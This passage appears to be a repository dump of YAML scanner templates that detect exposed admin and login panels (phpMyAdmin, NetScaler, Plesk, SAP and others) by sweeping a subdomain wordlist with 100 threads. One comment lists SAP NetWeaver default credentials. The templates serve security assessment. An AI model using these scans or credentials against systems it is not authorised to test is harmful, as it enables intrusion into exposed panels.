19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "ManageEngine - ADManager Plus"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/mantis-detect.yaml:
--------------------------------------------------------------------------------
1 | id: mantis-detect
2 |
3 | info:
4 | name: Mantis portal detection
5 | author: makyotox
6 | severity: info
7 | tags: panel,mantis
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login_page.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "MantisBT"
26 | part: body
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netlify-cms.yaml:
--------------------------------------------------------------------------------
1 | id: netlify-cms
2 |
3 | info:
4 | name: Netlify CMS Admin Panel
5 | author: sullo
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 | - type: word
26 | words:
27 | - "Netlify CMS"
28 | part: body
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscalar-aaa-login.yaml:
--------------------------------------------------------------------------------
1 | id: netscalar-aaa-login
2 |
3 | info:
4 | name: NetScalar AAA Login Panel
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6898
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /logon/LogonPoint/tmindex.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - "NetScaler AAA"
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscaler-aaa-login.yaml:
--------------------------------------------------------------------------------
1 | id: netscaler-aaa-login
2 |
3 | info:
4 | name: NetScaler AAA Login Panel
5 | author: dhiyaneshDk
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6898
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /logon/LogonPoint/tmindex.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - "NetScaler AAA"
27 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/netscaler-gateway.yaml:
--------------------------------------------------------------------------------
1 | id: netscaler-gateway
2 |
3 | info:
4 | name: Netscaler gateway
5 | author: joeldeleep
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /vpn/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - Netscaler Gateway
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/octoprint-login-1.yaml:
--------------------------------------------------------------------------------
1 | id: octoprint-panel 1
2 |
3 | info:
4 | name: OctoPrint Login
5 | author: affix
6 | severity: info
7 | tags: octoprint,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'OctoPrint Login'
25 | - type: status
26 | status:
27 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/octoprint-login-2.yaml:
--------------------------------------------------------------------------------
1 | id: octoprint-panel 2
2 |
3 | info:
4 | name: OctoPrint Login
5 | author: affix
6 | severity: info
7 | tags: octoprint,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /login/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'OctoPrint Login'
25 | - type: status
26 | status:
27 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/oipm-detect.yaml:
--------------------------------------------------------------------------------
1 | id: oipm-detect
2 | info:
3 | name: One Identity Password Manager detection
4 | author: nodauf
5 | severity: info
6 | tags: panel
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /PMUser/ HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
19 | matchers:
20 | - type: word
21 | words:
22 | - "One Identity Password Manager"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/oki-data.yaml:
--------------------------------------------------------------------------------
1 | id: oki-data-corporation
2 |
3 | info:
4 | name: Oki Data Corporation
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/5937
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /status.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Oki Data Corporation'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/openerp-database.yaml:
--------------------------------------------------------------------------------
1 | id: openerp-database
2 |
3 | info:
4 | name: OpenERP database instances
5 | author: impramodsargar
6 | severity: info
7 | tags: openerp,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /web/database/selector/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Odoo'
25 |
26 | - type: status
27 | status:
28 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/parallels-html-client.yaml:
--------------------------------------------------------------------------------
1 | id: parallels-html-client
2 |
3 | info:
4 | name: Parallels HTML5 Client
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /RASHTML5Gateway/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Parallels HTML5 Client"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/pentaho-panel.yaml:
--------------------------------------------------------------------------------
1 | id: pentaho-panel
2 |
3 | info:
4 | name: Pentaho Panel
5 | author: princechaddha,dhiyaneshDK
6 | severity: info
7 | metadata:
8 | shodan-query: 'pentaho'
9 | tags: panel,pentaho
10 |
11 | requests:
12 | - payloads:
13 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
14 | attack: sniper
15 | threads: 100
16 |
17 | raw:
18 | - |
19 | GET /pentaho/Login HTTP/1.1
20 | Host: {{Subdomains}}
21 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
22 | Accept-Encoding: gzip, deflate
23 | Accept: */*
24 | matchers-condition: and
25 | matchers:
26 | - type: word
27 | words:
28 | - 'Pentaho User Console - Login'
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 1
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-10.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 10
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /web/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-11.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 11
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /xampp/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 2
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-3.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 3
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-4.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 4
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-5.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 5
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /apache-default/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-6.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 6
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /blog/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-7.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 7
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /forum/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-8.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 8
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /php/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phpmyadmin-panel-9.yaml:
--------------------------------------------------------------------------------
1 | id: phpmyadmin-panel 9
2 |
3 | info:
4 | name: phpMyAdmin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /typo3/phpmyadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpMyAdmin"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/phppgadmin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: phppgadmin-panel
2 |
3 | info:
4 | name: phpPgAdmin Panel
5 | author: Ganofins
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /phppgadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "phpPgAdmin"
24 | - "browser.php"
25 | - "intro.php"
26 | condition: and
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/plesk-obsidian.yaml:
--------------------------------------------------------------------------------
1 | id: plesk-obsidian
2 |
3 | info:
4 | name: Plesk Obsidian
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6951
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login_up.php HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Plesk Obsidian'
26 |
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/plesk-onyx.yaml:
--------------------------------------------------------------------------------
1 | id: plesk-onyx-login
2 |
3 | info:
4 | name: Plesk Onyx login portal
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6501
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login_up.php HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'Plesk Onyx'
26 |
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/powerlogic-ion.yaml:
--------------------------------------------------------------------------------
1 | id: powerlogic-ion
2 |
3 | info:
4 | name: PowerLogic ION Exposed
5 | author: dhiyaneshDK
6 | severity: low
7 | reference: https://www.exploit-db.com/ghdb/6810
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'PowerLogic ION'
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/prometheus-exposed-panel.yaml:
--------------------------------------------------------------------------------
1 | id: prometheus-exposed-panel
2 |
3 | info:
4 | name: Prometheus.io exposed panel
5 | author: organiccrap
6 | severity: low
7 | tags: panel,prometheus
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /graph HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Prometheus Time Series Collection and Processing Server'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rabbitmq-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: rabbitmq-dashboard
2 |
3 | info:
4 | name: RabbitMQ Dashboard
5 | author: fyoorer
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "RabbitMQ Management"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/remote-ui-login.yaml:
--------------------------------------------------------------------------------
1 | id: remote-ui-login
2 |
3 | info:
4 | name: Remote UI Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6815
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers-condition: and
22 | matchers:
23 | - type: word
24 | words:
25 | - 'System Manager ID: | '
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rocketmq-console-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: rocketmq-console-exposure
2 |
3 | info:
4 | name: Apache RocketMQ Console Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "RocketMq-console-ng"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/rstudio-detect.yaml:
--------------------------------------------------------------------------------
1 | id: rstudio-detect
2 |
3 | info:
4 | name: RStudio panel detector
5 | author: philippedelteil
6 | severity: info
7 | tags: panel,rstudio
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'RStudio'
25 | part: header
26 | - type: status
27 | status:
28 | - 302
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/saferoads-vms-login.yaml:
--------------------------------------------------------------------------------
1 | id: saferoads-vms-login
2 |
3 | info:
4 | name: Saferoads VMS Login
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 | reference: https://www.exploit-db.com/ghdb/6941
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Saferoads VMS'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/samba-swat-panel.yaml:
--------------------------------------------------------------------------------
1 | id: samba-swat-panel
2 | info:
3 | name: Samba SWAT panel
4 | author: PR3R00T
5 | severity: info
6 | tags: panel
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET / HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
19 | Accept-Encoding: gzip, deflate
20 | Accept: */*
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Basic realm="SWAT"'
25 | part: header
26 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sap-hana-xsengine-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sap-hana-xsengine-panel
2 |
3 | info:
4 | name: SAP HANA XSEngine Admin Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /sap/hana/xs/formLogin/login.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "/sap/hana/xs/formLogin/images/sap.png"
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/sap-netweaver-portal.yaml:
--------------------------------------------------------------------------------
1 | id: sap-netweaver-portal
2 |
3 | info:
4 | name: SAP NetWeaver Portal
5 | author: organiccrap
6 | severity: info
7 | tags: panel,sap
8 |
9 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2&
10 |
11 | requests:
12 | - payloads:
13 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
14 | attack: sniper
15 | threads: 100
16 |
17 | raw:
18 | - |
19 | GET /irj/portal HTTP/1.1
20 | Host: {{Subdomains}}
21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
22 | matchers:
23 | - type: word
24 | words:
25 | - "SAP NetWeaver Portal"
26 | part: body
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/securenvoy-panel.yaml:
--------------------------------------------------------------------------------
1 | id: securenvoy-panel
2 |
3 | info:
4 | name: SecurEnvoy Admin Login
5 | author: 0xrod
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /secadmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - ''
25 | part: body
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/selenoid-ui-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: selenoid-ui-exposure
2 |
3 | info:
4 | name: Selenoid UI Dashboard Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
20 | matchers:
21 | - type: word
22 | words:
23 | - "Selenoid UI"
24 | - "/manifest.json"
25 | condition: and
--------------------------------------------------------------------------------
